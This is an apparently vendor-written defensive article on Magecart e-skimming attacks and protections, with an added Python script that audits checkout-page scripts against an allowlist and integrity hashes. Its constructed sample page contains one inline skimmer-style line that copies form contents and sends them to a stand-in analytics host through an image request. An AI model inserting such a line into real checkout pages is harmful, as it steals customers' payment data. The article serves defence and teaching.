Cybercriminals use e-skimming techniques to exfiltrate data from website shopping carts.
The global e-commerce market has skyrocketed since the COVID-19 pandemic, and shows no sign of slowing down. Organizations in a wide range of industries have added an e-commerce component to their websites, facilitating customer payments for products, services, subscriptions and fees.
Typically, organizations use a “shopping cart” application that handles the collection and processing of online payments. This functionality is available from many third-party providers and is easily plugged into an organization’s website. The problem is that shopping cart apps can be compromised: attackers inject a small piece of JavaScript, the e-skimmer, into the checkout page, where it copies card numbers and other payment details as customers type them and sends them to a server the attackers control, while the legitimate payment goes through undisturbed.
The Magecart Group 12 attack involved a PHP web shell disguised as a favicon (shortcut icon) file, which gave the attackers remote access to compromised servers. Because the web shell ran on the server, the attackers could fetch the e-skimming code from their command-and-control servers at request time rather than leaving a static copy of it on the site, which allowed it to evade most security tools.
A Look Inside a Magecart Attack
Magecart is an umbrella name for several criminal groups that use this technique. It first became active in 2015 and has primarily targeted Magento (the name combines “Magento” and “shopping cart”). A September 2020 zero-day attack targeting Magento 1, which had reached end of life in June 2020, affected thousands of e-commerce sites. However, security researchers have found at least one polymorphic e-skimmer that is capable of exfiltrating data from 57 different shopping cart platforms, so running something other than Magento is no protection.
Attackers may break into an organization’s website to insert the code or infect a third-party tag that causes the malware to run. An organization’s e-commerce site might incorporate code from dozens of different companies — which may in turn utilize code from other developers. Researchers at Instart found that 75 percent of the code executed by a given website comes from outside resources. A vulnerability in any one of these resources could lead to a data breach.
Magecart skimmers have also been distributed via GitHub, a hosting platform that allows software developers to share and manage source code. Git, the distributed version control system behind GitHub, ensures that every developer works from the same code, but a site that loads a library straight from a repository or CDN without pinning a specific version and verifying its hash automatically picks up any change, including a malicious one. Magecart code-injection techniques are constantly evolving and the skimmer code is routinely obfuscated, so scanning the code with signature-based security tools is not 100 percent effective.
How to Protect against Magecart Attacks
Organizations seldom have visibility into the third-party resources they use, and often don’t realize that malicious code has been injected into their site until a data breach occurs. However, there are steps organizations can take to prevent a Magecart attack. It is critical to know which remote servers the checkout page loads scripts from and sends data to, and to block any that aren’t trusted. In the browser, a Content Security Policy that restricts script-src, connect-src and img-src (skimmers often exfiltrate through image requests), together with Subresource Integrity hashes on third-party scripts, limits where code can come from and where form data can go; a recorded inventory of every script on the checkout page makes an unexpected addition or modification visible.
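One way to turn that inventory into a check, and to address the third-party code problem described earlier, is to audit the checkout page against what was approved at the last review. The following is an added example, not code from the article or from any shopping cart vendor: it collects every script on the page, flags hosts outside an allowlist and inline code that was not reviewed, and compares each external script's current body to the Subresource Integrity hash recorded at review time. The hosts, URLs, script bodies and the page itself are all constructed for the demonstration; in practice the `fetched` bodies would be downloaded from the live site.

```python
# Added example (not from the original article): inventory the scripts on a
# checkout page, flag hosts outside an allowlist and inline code that was not
# there at the last review, and compare each external script's current body
# against the Subresource Integrity (SRI) hash recorded at that review. All
# hosts, URLs, script bodies and the page itself are constructed for the demo.
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """SRI integrity string for a script body, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


class ScriptCollector(HTMLParser):
    """Collect external script URLs (with their integrity attribute) and the
    bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []      # [(src, integrity-or-None), ...]
        self.inline = []        # [script text, ...]
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attrs = dict(attrs)
        if attrs.get("src"):
            self.external.append((attrs["src"], attrs.get("integrity")))
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        if self._in_inline:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def audit_checkout_page(html, allowed_hosts, baseline, known_inline, fetched):
    """
    html          page source of the checkout page
    allowed_hosts hosts that scripts may be loaded from (relative URLs are first-party)
    baseline      {src: integrity} recorded when the page was last reviewed
    known_inline  set of integrity strings of reviewed inline scripts
    fetched       {src: bytes} the script bodies served right now
    Returns a list of findings; an empty list means the page matches the review.
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, integrity in collector.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(f"script from non-allowlisted host: {src}")
        if integrity is None:
            findings.append(f"no integrity attribute on {src}")
        expected = baseline.get(src)
        if expected is None:
            findings.append(f"script not in baseline: {src}")
        else:
            if integrity is not None and integrity != expected:
                findings.append(f"integrity attribute on {src} differs from baseline")
            if src in fetched and sri_hash(fetched[src]) != expected:
                findings.append(f"content of {src} changed since baseline")
    for body in collector.inline:
        if sri_hash(body.encode()) not in known_inline:
            findings.append(f"unknown inline script: {body[:60]!r}")
    return findings


# --- constructed sample data (hypothetical hosts and scripts) ---------------
CHECKOUT_URL = "https://cdn.example-payments.com/checkout.js"
APP_URL = "https://static.example-shop.com/app.js"
STATS_URL = "https://stats.example-analytics.net/t.js"     # not on the allowlist
ALLOWED_HOSTS = {"cdn.example-payments.com", "static.example-shop.com"}

CHECKOUT_JS = b"window.Checkout = {pay: function (form) { /* ... */ }};"
APP_JS_AT_REVIEW = b"console.log('app v1');"
APP_JS_NOW = APP_JS_AT_REVIEW + b"\n(function () { /* appended after review */ })();"

BASELINE = {CHECKOUT_URL: sri_hash(CHECKOUT_JS), APP_URL: sri_hash(APP_JS_AT_REVIEW)}
KNOWN_INLINE = {sri_hash(b"window.cartId = 'placeholder';")}
FETCHED = {CHECKOUT_URL: CHECKOUT_JS, APP_URL: APP_JS_NOW, STATS_URL: b"/* not reviewed */"}

# The last inline script mimics what a skimmer does: copy the form and beacon it out.
PAGE = f"""<html><head>
<script src="{CHECKOUT_URL}" integrity="{BASELINE[CHECKOUT_URL]}" crossorigin="anonymous"></script>
<script src="{APP_URL}"></script>
<script src="{STATS_URL}"></script>
<script>window.cartId = 'placeholder';</script>
<script>document.forms[0].onsubmit=function(){{new Image().src='https://stats.example-analytics.net/c?d='+btoa(this.innerText)}}</script>
</head><body><form id="checkout"></form></body></html>"""


def demo() -> list[str]:
    return audit_checkout_page(PAGE, ALLOWED_HOSTS, BASELINE, KNOWN_INLINE, FETCHED)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run against the sample page, the audit reports nothing for the pinned payment script, notes that `app.js` has no integrity attribute and has changed since review, flags the analytics script on three counts (unknown host, no integrity, not in baseline), and reports the second inline script as unreviewed. The same allowlist and hashes are what a Content Security Policy and `integrity` attributes enforce in the browser; the audit is the out-of-band check that those controls still match the page actually being served.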
Organizations should also implement controls to prevent the installation of web shell “backdoors,” such as the one used in the Magecart Group 12 attack. A web shell gives attackers virtually unfettered access to execute commands and code, install malware and connect to their command-and-control servers. Restricting file uploads, configuring the web server so that files in media and upload directories are never executed as PHP, and monitoring the web root for unexpected file changes make a web shell harder to plant and easier to spot. Strong perimeter security and network segmentation can help prevent attackers from entering the network and moving from system to system.
Of course, many attacks originate with user error and poorly secured endpoint devices. Organizations should train users to spot phishing emails with malicious links and attachments. It’s also important to change default login credentials, including those for the e-commerce platform’s administrative console, and use strong passwords that cannot be easily guessed. Multifactor authentication adds another layer of protection.
A qualified managed services provider can help organizations implement this kind of layered security approach, and ensure that all systems and applications are kept up-to-date and patched. Continuous monitoring of the IT environment can detect malicious activity and exploits that get past perimeter defenses.
The rising use of e-commerce has led to a corresponding uptick in Magecart attacks. Organizations should take steps to secure their e-commerce sites and shopping cart apps to reduce the risk of a costly data breach.